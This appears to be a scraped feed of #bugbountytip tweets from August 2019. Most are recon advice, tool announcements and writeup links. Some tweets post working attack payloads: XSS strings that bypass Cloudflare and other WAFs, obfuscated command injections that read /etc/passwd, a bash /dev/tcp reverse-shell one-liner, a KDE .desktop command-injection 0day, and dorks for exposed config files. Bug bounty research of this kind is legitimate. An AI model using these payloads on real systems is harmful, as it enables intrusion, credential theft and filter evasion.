2019-08-20 10:25:10
1 #hackerone #bugbounty #bugbountytip I just published How I upgraded my privileges to the administrator of Odnoklassniki’s url shortener https://t.co/yBKYctUp0a
Fisher
@Regala_


2019-08-20 09:20:01
14 Here it is! Burp Scope Monitor, a simple @Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/2zzgrNvj3G #bugbounty #bugbountytip 🥳🥳😇
luffydragneel
@Hackers_Guild


2019-08-20 06:53:26
0 If there is a subscription for a pro account for suppose 1 year, always Intercept the Request and change the subscription period. In some cases, you will be able to increase the subscription to any no. of years leading to Business logic vuln. #bugbountytip @SynackRedTeam https://t.co/NLDXDbquzY
Osama Avvan
@osamaavvan


2019-08-19 18:07:09
1 My Writeup about Different Ways of Exploiting CSRF. https://t.co/yneogH4EYL #bugbountytip @bugbountypocs
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-19 16:40:35
0 { WAF }; bypass post based xss ✨ ~Payload; <message><dialogueType>&e;</dialogueType></message> ~Result; WAF Allowed: 200 #BugBounty #BugBountyTip #WAF #infosec https://t.co/f28Yby7WZR
Soroush Dalili
@irsdl


2019-08-19 11:33:43
0 #BugBountyTip: To make your Burp Suite testing faster, change its colour to Red! With go faster stripes as suggested by @bao7uo
Proxy
@LinuxKodachi


2019-08-19 11:27:51
0 🛡 Honest advice, Sherlock! 🛡 #bugbountytip #mentor #entrepreneur #Developer #programming #programmers #startup https://t.co/0I8cofTS3X
ak1t4 🇦🇷
@akita_zen


2019-08-19 06:38:08
2 #Bugbountytip: avoid to define yourself for what you know or what you have or what you get ($$$). You are truly unique and your being can’t be defined by a temporal status. Enjoy bugbounty, play a little, bb needs to be fun :) #bugbounty #infosec #mentalhealth
Cyberthereaper
@Cyberthereaper3


2019-08-19 06:33:41
4 S3 bucket finder cat subdomain.txt | httprobe | tee hosts && meg -d 1000 -v / && grep -horiE [A-z0-9.-]+\.s3\.amazonaws\.com (You can change regex or you can add more regex with && ) @TomNomNom #hackerone #bugcrowd #recon #infosec #blackhat #bugbounty #bugbountytip #osint #s3
mr_nyx
@mr_nyxs


2019-08-18 19:11:24
1 Never give up! Payload URLENCODE(payload) URLENCODE(URLENCODE(payload)) URLENCODE(URLENCODE(URLENCODE(payload))) ... #BugBountyTip #BugBounty
HackIsOn ®
@hackison


2019-08-18 17:33:00
0 What will be your answer to the following question #infosec people? 🤔 How to #hack android phones using Link ? 😂 #hacking #pentesting #linux #bugbounty #bugbountytip #exploit #kalilinux #offsec #redteam #pentester #hackison #wapt #vapt
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 17:12:44
2 Hi babe again I'm, whats up fbi. I warned very , lest he remove the search button from there. 💣 Patch: https://t.co/NhIAxHWUUl #BugBounty #BugBountyTip #WAF #infosec https://t.co/azwQwX5nMh
YS
@YShahinzadeh


2019-08-18 16:45:08
0 JSONP call returning auth token -> acc takeover #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-08-18 15:42:00
0 Don't expect different assets/endpoints if you are searching in the same subdomain. #bugbountytip #BugBounty #WebPentest #SearchSomethingElse
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 14:21:24
5 "Cloudflare"; live payloads: 🧠 ~1: <img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'> ~2: <img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//"" src="x" alt="showme"> #BugBounty #BugBountyTip #WAF
NetDevilz
@netdevilz


2019-08-18 13:03:14
0 Time may have forgotten everything, never date ... #netdevilz İCANN: https://t.co/FZafbc6qaj #bugbounty #webapp #bugbountytip #infosec #waf https://t.co/sYW3KKhdSo
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 08:43:13
1 Sucuri { RCE }; payloads, dot shot. 🌪️ Smuggling RCE Payloads: </> /???/??t+/???/??ss?? </> Obfuscating RCE Payloads: </> ;+cat+/e'tc/pass'wd </> </> c\\a\\t+/et\\c/pas\\swd </> #BugBounty #BugBountyTip #WAF #infosec
Str0k1rch
@str0k1rch


2019-08-18 08:32:02
1 Do you guys stop trying for XSS When Cloudflare is used? If not, got any tips? :) #bugbountytip #bugbounty #infosec
Murdockz
@Murdockz_CEH


2019-08-18 02:47:26
1 Guys if you're looking for a way to host a Kali Linux instance in the cloud check out this tutorial on creating your own Kali Linux cloud VM with DigitalOcean https://t.co/xnP1cfd8lZ. I highly recommend. https://t.co/0TpWOKInke #bugbountytips #bugbountytip #bugbounty
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-17 20:41:53
4 ModSecurity { RCE } Detection Bypass 💥 { 1 }; ;+$u+cat+/etc$u/passwd$u { 2 }; ;+$u+cat+/etc$u/passwd+\# #BugBounty #BugBountyTip #WAF #infosec
John
@JohnH4X00R


2019-08-17 18:23:03
2 "Rather than scanning for vulnerabilities, we need to scan for interesting behaviours"... Excellent advise by @albinowax from an old gem, must read... https://t.co/9FPy2OnCBM #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-17 18:22:39
2 Bug Bounty Tip : Target Android Mobile Apps to get the Endpoints/Hostnames and Run PortScan -- #BugBounty #BugBountyTip #hackdoor
C1h2e1
@C1h2e11


2019-08-17 13:41:05
1 #BugBounty #bugbountytip Try to scan these sensitive files or add a header for a quick vulnerability scan https://t.co/ZuZ5xMEqmj
Ammar Amer
@cry__pto


2019-08-17 03:29:40
2 the most tow free important resource on the net to learn how to detect & exploit open-redirect & evade WAFs.if you are serious about learning thise vulnerability you should visite thise sites. https://t.co/IgbCjfguvb https://t.co/dGFkRiy43A https://t.co/1R23RdPEDN #bugbountytip
Soroush Dalili
@irsdl


2019-08-16 21:46:24
3 After spending so much time, finally here it is: "𝗨𝗽𝗹𝗼𝗮𝗱𝗶𝗻𝗴 𝘄𝗲𝗯.𝗰𝗼𝗻𝗳𝗶𝗴 𝗳𝗼𝗿 𝗙𝘂𝗻 𝗮𝗻𝗱 𝗣𝗿𝗼𝗳𝗶𝘁 𝟮" https://t.co/L2XrRRfqU6 #appsec #FileUpload #pentest #bugbountytip https://t.co/O3jVp0TWVq
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-16 21:18:20
0 #burp, #bugbountytip,#bugbountytips Recon with BurpSuite. Only burp no extender. I like this way. https://t.co/siOc5UaDLf
SALTWRX
@SaltwrxLLC


2019-08-16 17:14:00
1 @AFSLabs For those looking to setup a droplet for doing reconnaissance. #bugbountytip
HackIsOn ®
@hackison


2019-08-16 14:45:08
0 [Sensitive Directories] intitle:"Index of" wp-config.php [Sensitive Directories] intitle:index.of./.sql [Pages Containing Login Portals] site:*/cgi-bin/login.html [Various Online Devices] inurl:ftp://ftp robots.txt #dorks #hacking #bugbountytip #bugbountytips #pentesting
Milind Purswani
@MilindPurswani


2019-08-16 14:28:52
0 Have been testing for SSRF bypass for more than 2 hours on 1 endpoint -> Read the policy -> turns out, the endpoint is OOS. "Read the docs man! Read the docs!" 😑😑 #bugbountytip
OWASP Amass
@owaspamass


2019-08-16 14:23:16
0 OWASP Amass Fact: If you use the '-include' flag to reduce sources during your enum, be sure to include one or more of the following for ASN info: networksdb, radb, robtex, shadowserver, teamcymru and/or umbrella #osint #recon #bugbounty #bugbountytip https://t.co/QWTftRbJKT
expl0itc0der
@vanshitmalhotra


2019-08-16 14:04:28
1 Bug Bounty Tips - Always Read The Source Code //<>// #BugBounty #BugBountyTip
vj0shii
@vj0shii


2019-08-16 12:30:00
0 Best laptop for Penetration Testing and Bug Bounty Hunting @Apple @Dell @ASUS_ROG #bugbountytip #Pentesting
Detectify
@detectify


2019-08-16 11:00:10
0 Improving WordPress plugin security from both attack and defense side. Guest blog by @padannewitz. #detectifycrowdsource #bugbountytip https://t.co/627leeeH6R
abdoul gadiri balde
@moodiAbdoul


2019-08-16 10:26:29
1 #bugbounty #bugbountytips #bugbountytip never think that you can find nothing , i hacked a company that have top hacker in 00:51:31 #togetherwehitharder
Fisher
@Regala_


2019-08-16 07:32:13
0 Beta testing for Scope Monitor has started 🥳🥳 #bugbounty #bugbountytip https://t.co/KREdPY8rJT

@saurinn_


2019-08-16 01:40:12
0 Anyone have a link for a tool to test for different kinds of tokens (Docker specially)? It has a GitHub repo #bugbountytip #bugbountytips #infosec
Mo'men Basel
@Momenbassel


2019-08-15 22:40:44
0 HTTP request headers can be a golden gem for finding vulnerabilities never miss tampering/adding these headers! https://t.co/SdDV656qa7 #BugBounty #bugbountytip #bugbountytips
Hussein Daher
@HusseiN98D


2019-08-15 22:05:06
7 A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! ALSO: I'm interested in any security research team / pentest work (remote). If any company/team is interested about my services DM me :) #bugbounty #bugbountytips #bugbountytip #infosec https://t.co/S1BpVB2LWM
Spicy
@BlackSheepSpicy


2019-08-15 21:31:56
0 #bugbountytip brought this up in @thecybermentor 's stream chat last night but you can load line separated text files into burp suite's scope so you can literally paste sublist3r's output into a text file and chuck the entire scope into burp with just a few clicks #BugBounty
Daher Mohamed
@DaherMohamed4


2019-08-15 20:14:51
0 #BugBountyTip #BBTip If you have win10 and don't want/can't install linux, you can use this tut to have linux/ubuntu terminal on windows : https://t.co/ftDEbdjv8U Must have win10 64 bits
m0z
@LooseSecurity


2019-08-15 14:44:56
1 A lot of programmers seem to forget that POST parameters pose the exact same risks as GET parameters. POST-Based XSS POST-Based CSRF You can even get SQL Injection through POST parameters. It's obvious but some people only check GET parameters out of convenience. #bugbountytip
MRunal
@mrunal110


2019-08-15 10:10:41
4 I just published What is Server-Side Request Forgery (SSRF) and some proof of concept about SSRF. https://t.co/uaTPqB470R #bugs #bugbountytip #infosecurity #cybersecurity #responsibledisclosure #vulnerabilities
Alex Chapman
@ajxchapman


2019-08-15 08:45:26
1 When you get RCE/ Command Injection on a server, check the system uptime. This can reveal the (ab)use of containers and help clarify technical risk #bugbountytip learned from @erbbysam at #h1702
Hendrik
@hendrikvb


2019-08-14 21:29:12
0 #CSRF lesson of the day: IE11 does not properly handle #CORS checks on file URIs! #bugbountytip #vuln #infosec
lavernasec
@lavernasec


2019-08-14 14:38:00
0 Pwn an iPhone to bank $1m and Check Point gripes about WhatsApp privacy again https://t.co/fBUkEesuVv #bugbountytip #iphone #whatsapptips #privacy
{{ '127.0.0.1’}}
@shivam31200


2019-08-14 08:45:53
0 So testing e commerce websites always check cms I found one of e commerce website is using magento I run as magento scan and found critical paths #bugbounty #bugbountytip Noob https://t.co/BBBPNECcrw
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-14 00:19:08
2 </>Cloudflare skip filters, ~XSS Bypass via dot. <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X #WAF #BugBounty #BugBountyTip #infosec
HackIsOn ®
@hackison


2019-08-13 20:17:42
2 Here is a video about the complete step by step installation procedure of latest #nmap 7.80. #hacking #kalilinux #linux #bugbountytip #bugbounty #penetrationtesting #pentesting #windows #redteam 🔴 LINK: https://t.co/8FTl0sOOgT
Vail
@Vail_302


2019-08-13 19:41:01
0 I am still new to #bugbounty , however, if this can help anyone else, I built a cherrytree template to help with organization of targets. Any tips on making it better, let me know. #bugbountytip https://t.co/Ew4mIgsFiu
MRunal
@mrunal110


2019-08-13 18:35:46
0 I Published open-redirect-vulnerability blog https://t.co/tZezs6hMUN #bugs #bugbountytip #infosecurity #cybersecurity
ADM|N|STRAT0R
@strat0r


2019-08-13 17:54:39
0 You can use https://t.co/5wzwWvgY36 or google cache to peek at the landing page for public GitHub repos that have been taken offline ;) #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-13 16:14:40
1 Amazon EBS snapshots exposed publicly leaking sensitive data in hundreds of thousands, security analyst reveals at DefCon 27 #BugBounty #BugBountyTip #devops #devsecops #penetrationtesting #pentesting #aws #cloud #security #cloudsecurity https://t.co/E0M5006vhc
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-13 12:52:25
0 Bug bounty is a project designed to stop hackers and to learn the techniques and methods of hackers. { fucking mercenaries }; #BugBounty #BugBountyTip #WAF #infosec
Fisher
@Regala_


2019-08-13 08:54:07
1 Bounty hunters: how do you organize your notes on targets, especially when switching targets back and forth and doing it for a long time? A thread 👇👇👇 #bugbounty #bugbountytip
GarimaShares
@GarimaBhaskar


2019-08-13 06:50:02
0 Apple is Offering a Bug Bounty of $1 Million If You Can Hack An iPhone https://t.co/nea8djOCnK #Apple #appledaily #applenews #AppleEvent #bugbountytip #MiLLiONS #technews #technologynews #hacking #Hackers #TechTrends #bloggerstribe #blogger #blogpost #garimashares #iOS #macOS https://t.co/Lk3P2YJyt8
mr_nyx
@mr_nyxs


2019-08-12 21:33:27
0 If you have a shop system or any other buying system, you should try intercepting both requests and responses and change the prices in both of them, you might find yourself paying only $5 instead of $1000 #BugBountyTip #BugBounty #parameter_tampering
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-12 20:09:34
0 109 Payloads {URL} for #Hackerone_Programs #DOD #Private_Programs #Public_Programs #bugbounty #recon #bugbountytip https://t.co/e8Tm8nwz2B
Mufeed VH
@mufeedvh


2019-08-12 16:52:00
1 sector:443 CTF Walkthrough: https://t.co/0BWhT2HYFj #ctf #capturetheflag #bugbounty #bugbountytip #bugbountytips
lavernasec
@lavernasec


2019-08-12 14:38:00
0 Apple will now pay hackers up to $1 million for reporting vulnerabilities https://t.co/kYH14KVkB9 #bugbountytip #Apple #vulnerabilities
Ammar Amer
@cry__pto


2019-08-12 12:01:33
2 OPEN REDIRECTS is a dangerous web application vulnerability that should not be ignored by the security team/bug bounty hunters. thise vunerability may lead to installing malware/phishing attacks. and at least the loss of the reputation and clients. #bugbountytip
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-12 11:38:33
0 #Verizon - CORS Vulnerable Lead's to Information Disclousure (Criticals Impact) #BugBounty #BugBountyTip #CORS https://t.co/zDzL0gjDK9
Wladimir Palant
@WPalant


2019-08-12 09:06:09
2 I tried producing some useful instructions for less experienced people to recognize flaws in password managers. Let me know whether it worked! #infosec #crypto #passwords #bugbounty #bugbountytip https://t.co/WTm5SDpTi9
Ameen
@ameenmaali


2019-08-12 06:48:12
3 #bugbountytip: Duplicating params, headers, etc can be useful for bypasses. i.e., file upload filters can potentially be bypassed by setting Content-Type twice (once for unallowed type and once for allowed). Authorization protection could be bypassed w/ the same method #bugbounty
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-10 15:55:30
1 Finding was closed, no return. @YoncuBilisim #WAF #BugBounty #BugBountyTip #infosec https://t.co/eoVvedJriy
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-10 15:52:25
0 { Cloudflare }; ~ XSS Bypass: 🦍 </Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt> #BugBounty #WAF #BugBountyTip #infosec
[email protected]:~$ sud¤ rm -r /*
@IAMPROPERSAM


2019-08-10 12:15:05
0 I nd so many others out there definitely needs this... Thanks man. #bugbountytip #bugbountytips https://t.co/wUNiL9k1t7
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 06:05:19
3 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #BugBounty #BugBountyTip #infosec
Aziz Hakim
@hackerb0y_


2019-08-10 05:48:46
1 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #infosec #bugbountytips #bugbountytip #bugbounty #xss
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 05:29:43
0 13 Hours ~ Fullstack Bug Bounty Programs H1 - 5 Reports Triaged Bugcrowd - 1 Triaged Yeswehack - 4 Triaged Graphql SQL-Injections / CORS / Blind SQL #BugBounty #BugBountytip #13hours #livehacks https://t.co/odsYNkdX2A
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 01:31:17
1 Graphql Api Leads to SQL - Injections #graphql #bugbounty #bugbountytip #bugbountytips https://t.co/lFNawsyPA5
Securisec 🚀
@securisec


2019-08-09 22:46:15
0 "RT RT zer0pwn: Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/5f2PjHvwNE #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/1poKJWd4FW"
Arif Khan
@payloadartist


2019-08-09 20:15:13
0 I earned $1,500 for my submission on @bugcrowd #ItTakesACrowd #bugbountytip: Recon is the key to low hanging fruits with great impact! https://t.co/7of1OAuwxa
Guilherme Keerok
@k33r0k


2019-08-09 19:47:55
1 another Cloudflare bypass: <iframe/src=javascript:%2520with(document)with(body)innerHTML="<svg/onload"%2B"=alert\x28\x29\x3e"> #bugbountytip #bugbounty #xss #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-08-09 19:19:28
0 I you have found an XSS on https://t.co/hykP1iWSJZ ,Find pages running this code on https://t.co/bveLMweNqR : document.domain="https://t.co/dLs7d73fmn " It results in: XSS on A > XSS on B as SOP allows https://t.co/hykP1iWSJZ to access https://t.co/bveLMweNqR #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:07:47
0 Cryptographic Attacks: A Guide for the Perplexed https://t.co/tRqja9L8pA Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:06:10
3 One Misconfig (JIRA) to Leak Them All- Including NASA and Hundreds of Fortune 500 Companies! https://t.co/k6aYmRDj1e Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Twitter - https://t.co/KupiQVo8ex Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
intigriti
@intigriti


2019-08-09 12:08:03
4 Doing recon? Don't forget the company resources! Slides, tutorials and other examples often contain a lot of juicy information! 👀Thanks for the #BugBountyTip, @Alyssa_Herrera_! #HackWithIntigriti https://t.co/CT1UYBZefH
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-09 09:51:11
1 #blindrce turn it in to a { reverse shell! } 👁️ |`bash -i >& /dev/tcp/yourip/yourport 0>&1` #bugbounty #bugbountytip #waf #infosec
Ennio Campagna
@EnnioCamp


2019-08-09 08:36:10
0 Got excited this morning, just entered in the @CERTEU Hall of Fame, thank you to the #securityteam for the fast response! #bugbounty #bugbountytip perseverance is the key of success
Yassine Aboukir @ DefCon/H1-702
@Yassineaboukir


2019-08-08 20:46:55
0 Cheers to @NahamSec for featuring [ASNLookup](https://t.co/wGiLKKnvCb) tool in his latest stream about techniques to enumerate more assets leveraging Yahoo's ASN as a target example. Check it out! https://t.co/PcoHujPdsV #bugbountytip
Ameen
@ameenmaali


2019-08-08 20:12:30
2 Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty
Dominik
@zer0pwn


2019-08-08 17:24:08
11 Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/L0P5wVuwFD #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/lxygQ8RqSK
gujjuboy10x00
@vis_hacker


2019-08-08 15:30:21
1 awesome git recon for bug hunters specially for newbie @Bugcrowd #ItTakesACrowd #bugbountytip https://t.co/I1r38Ms06X
Spicy
@BlackSheepSpicy


2019-08-08 15:26:51
0 #bugbountytip web server being annoying and 302ing your gobuster? use the wildcard flag and pipe the output thru an inverted grep expression #bugbounty https://t.co/KGeBLCvVzf
artofbugbounty
@artofbugbounty


2019-08-08 15:08:15
0 Not Your Typical Base64 Encoded Data! #bugbountytip https://t.co/pzvYvpzUm6 https://t.co/akZueVxv7o
A DNF 🦖
@binb4sh


2019-08-08 10:47:40
0 I you have found an XSS on https://t.co/N5KFrxiY6l ,Find pages running this code on https://t.co/qV8UvGQ3nY : document.domain="https://t.co/2KVRowDP4i" It results in: XSS on A > XSS on B as SOP allows https://t.co/N5KFrxiY6l to access https://t.co/qV8UvGQ3nY #bugbountytip
Aashish Yadav
@aa5h15h


2019-08-08 10:26:05
1 Listed In Mozilla HOF https://t.co/hjvZ92kFOj #bugbounty #bugbountytip #webdev #mozilla #firefox #hackerone #bugcrowd #linux #unix #malware @mozilla
Mantis
@MantisSTS


2019-08-08 07:54:08
1 Thi should come in useful to some! #BugBounty #bugbountytip https://t.co/3jjJ8PrB2c
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-08 07:01:47
0 Paypal Bug Bounty 2019 - Exploiting HTML Injections https://t.co/EvfnAj5QmI #Paypal #BugBounty #BugBountyTip
Benson M
@Benson_Mwaura


2019-08-08 05:00:00
0 🛡️ Discover How Do Bug Bounties Fit Into The Software Development Lifecycle (#infographic 🎨 @Hacker0x01 ) @Fisher85M @pierrepinna @Shirastweet @CLAVDIAmartin @marcoessomba @ggithaiga #Cybersecurity #SecOps #DevOps #CISO #Cloudsec #Infosecurity #bugbountytip #bountyprogram https://t.co/TmRTGB8Mhv
Sanju
@sanjeethboddi


2019-08-08 02:45:12
0 @Amazon If you say simple "another" to the Alexa. It tells you a joke, which doesn't make any sense. You need to fix your NLP/NLG and make you have a proper dialogue flow. #bugbountytip #bugreport #alexa #amazonalexa #nlp #nlg
vavkamil
@vavkamil


2019-08-07 20:21:10
1 XFFenum ~ A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header #bugbounty #bugbountytip https://t.co/BR0X8TlGfT
Sajibe Kanti
@Sajibekantibd


2019-08-07 20:04:45
0 Some Time Check Cookies when Testing PHP based Web Pentest . Maybe You will get Password & user id on Cookies ;) #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-07 19:58:38
0 Reading { #passwd }, and other files. 🐧 /***/[c][a]* /**[c]/*****[d] {/???/??t,/**[c]/*****[d]} /***/??t /**[c]/*****[d] /***[n]/??t /??[c]/?????[d] #WAF #BugBounty #BugBountyTip #infosec
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-07 19:01:41
0 #bugbountytip #bugbountytips Path: target/worker Yesterday my report Worker Loop Admin panel Noswag, nobounty, nothing Only thanks from owner :) sometime I am kind :) https://t.co/6yIqsMpfU6
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-07 16:51:53
0 XSS { Cloudfare } bypass: 🔭 </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
intigriti
@intigriti


2019-08-07 16:51:01
0 Got a question? Follow @codingo_'s advice to get help faster! #BugBountyTip https://t.co/pkmcXReL9P
expl0itc0der
@vanshitmalhotra


2019-08-07 16:23:29
2 Security through obscurity works against scanners -- Agree/Disagree ?? #BugBounty #BugBountytip #penetrationtesting #pentesting #hacking #devops #devsecops
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-07 13:20:11
13 XSS { Cloudfare } bypass: 🔭 </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
Pavandeep
@Pavandep8


2019-08-07 13:13:18
0 Look what I shared: An introduction to Stack Buffer Overflows - #Hacking #hacker #Security #bugbountytip #BugBounty @MIUI| https://t.co/hM2ysqlhmI
expl0itc0der
@vanshitmalhotra


2019-08-07 12:46:03
0 https://t.co/X7i6Q9BLRA - SEARCH FOR LEAKS Search for Twitter users leaks #OSINT #recon #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-07 11:52:48
2 go ahead and get those awesome free udemy courses for a limited time about python,hacking,ceh,networking,cybersecurity. 18 awesome course for a limited time. may the offer will end after 6 hours. so please share the post. #Hacking #pentest #bugbountytip #infosec #osint https://t.co/Gfiei78NO7
miraitowa
@miraitowa1


2019-08-07 10:25:53
0 Mahmoud Gamal - Security Blogs: Exploiting Out Of Band XXE using internal network ... https://t.co/CgGJMGZWfT #Bugbounty #bugbountytip #XXE
Hilary Sylar
@bit3c0de


2019-08-07 08:57:12
0 In honour of the best XSS tool out here, i wrote a small post about it. Simple and to the point. Great success with it and thought i'd share. https://t.co/UtvkJ3XFu0 #BugBounty #bugbountytip #pentest #xss #knoxss Thanks for the tool @brutelogic .
Mo'men Basel
@Momenbassel


2019-08-07 06:24:37
3 #bugbountytip: install keyFinder at your browser(https://t.co/TqSwU28eb4) --> surf the web --> go to results --> check API key at https://t.co/S3jRAYOEZp #BugBounty #bugbountytips #BugbountyProTip https://t.co/s0uGltinAD
expl0itc0der
@vanshitmalhotra


2019-08-06 20:53:06
0 Any script/one line command on aws cli to quickly get the list of permissions enabled for s3 bucket ? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl - - bucket bucketname
Pepipost
@pepi_post


2019-08-06 18:27:35
0 Are your emails really reaching Inbox? Find out in this free Email Health Report. Click here : https://t.co/Qr4QcFTjbi #bugbountytip #smtp https://t.co/2U7otQsTLZ
Pepipost
@pepi_post


2019-08-06 16:39:14
1 Is there a way to validate email addresses using #javascript? Lets find out - how!👉 #bugbountytip https://t.co/9FBQD6PGOH
Ammar Amer
@cry__pto


2019-08-06 15:02:59
1 in the 19 chapter of the Real-world Bug Hunting by @yaworsk you will get a useful and detailed chapter about target RECONNAISSANCE and testing the application in an efficient and practical way. again the book is highly recommended. you can find the book at amazon #bugbountytip https://t.co/fPMrQyktZJ
Dhamu
@Dhamuharker


2019-08-06 14:50:27
1 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder XSS to RCE https://t.co/6YM2sk2j9Z
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-06 13:21:38
2 Bypass 405 Alibaba { WAF }; 🐞 with onloadstart/end and encode the parenthesis, /* <audio src=1 onloadstart=alert(1)//> */ #WAF #BugBounty #BugBountyTip #infosec
miraitowa
@miraitowa1


2019-08-06 13:02:37
3 Recon — my way. by @ehsahil https://t.co/5sLBmHqhM8 #bugbounty #bugbountytip #recon
expl0itc0der
@vanshitmalhotra


2019-08-06 12:39:44
0 #Subfinder - Installation and Usage - #hackdoor #bugbounty #tutorial #bugbountytip https://t.co/gQgX9bc4ab
expl0itc0der
@vanshitmalhotra


2019-08-06 12:17:42
1 #Sublister - Installation And Usage Tutorial #bugbounty #bugbountytip #hackdoor https://t.co/hp38xeL37x
expl0itc0der
@vanshitmalhotra


2019-08-06 12:13:31
1 #OWASP #JuiceShop - Challenge / SQL Injection Tutorial #hackdoor #devops #devsecops #bugbounty #bugbountytip https://t.co/N4vjkRujJj
Pepipost
@pepi_post


2019-08-06 09:31:48
3 Send email from website using #javascript #bugbountytip https://t.co/MIzaxCbzXt
Pepipost
@pepi_post


2019-08-06 09:24:59
1 Send email to multiple recipients using AddAddress() in #phpmailer #bugbountytip https://t.co/7JklR843zt
bayani elogada
@metamudkip


2019-08-06 02:33:37
0 The lack of Access-allow-* headers disable CORS on Javascript, but not Postman. Not really a #bugbountytip but oh well
Konark Modi
@konarkmodi


2019-08-05 22:24:15
0 As always a brilliant finding by @logicbomb_1 . Btw, apart from google dork queries you can also use Common Crawl Index to increase your coverage. Example: ``` curl -sX GET "https://t.co/7l4F17TQKh" | jq -r .url | sort -u | cut -d'/' -f3 | sort | uniq ``` #bugbountytip https://t.co/MnOLHGtEg2
Dominik
@zer0pwn


2019-08-05 17:42:05
10 KDE 4/5 KDesktopFile (.desktop) Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/QRtX9Kwd1w
Petko D. Petkov
@pdp


2019-08-05 17:40:15
0 Before running you’ve got to warm up. Before public speaking you’ve got to warm up. But I’ve rarely seen anyone consciously taking steps to warm up before hacking. How is this any different? To get good results you need to make sure your mind is in the right state. #bugbountytip
intigriti
@intigriti


2019-08-05 14:26:22
8 According to @itscachemoney, this sometimes leads to account takeover vulnerabilities. 🤯#BugBountyTip #HackWithIntigriti https://t.co/jQ84SF3tdq
Ammar Amer
@cry__pto


2019-08-05 08:00:11
1 have a questions about hacking ask the questions in the comment section . i will help you. #bugbountytip #hacking #redteam #osint #cybersecurity #infosec
Dominik
@zer0pwn


2019-08-05 03:56:03
0 KDE 4/5 KDesktopFile Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/Z49mw6rLni
Ennio Campagna
@EnnioCamp


2019-08-04 22:10:09
0 Great stream @NahamSec, every time i learn something new from your streaming 🙏 #bugbountytip #recon
Fisher
@Regala_


2019-08-04 18:22:18
2 Mediocre hunters: fuck there is no way there is a bug on this long standing hardened target Pro hunters: pretty sure there's a bug here somewhere #bugbounty #bugbountytip
Konark Modi
@konarkmodi


2019-08-04 17:25:14
2 If you are testing access to S3 buckets and do not want to configure credentials for testing use —no-sign-request. ‘aws s3 command S3://bucket/file —no-sign-request’ #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-04 13:46:58
1 CloudFlare { XSS } Bypass Payload via dot: 🐞 <--`<img/src=` onerror=confirm``> --!> #WAF #BugBounty #BugBountyTip #infosec
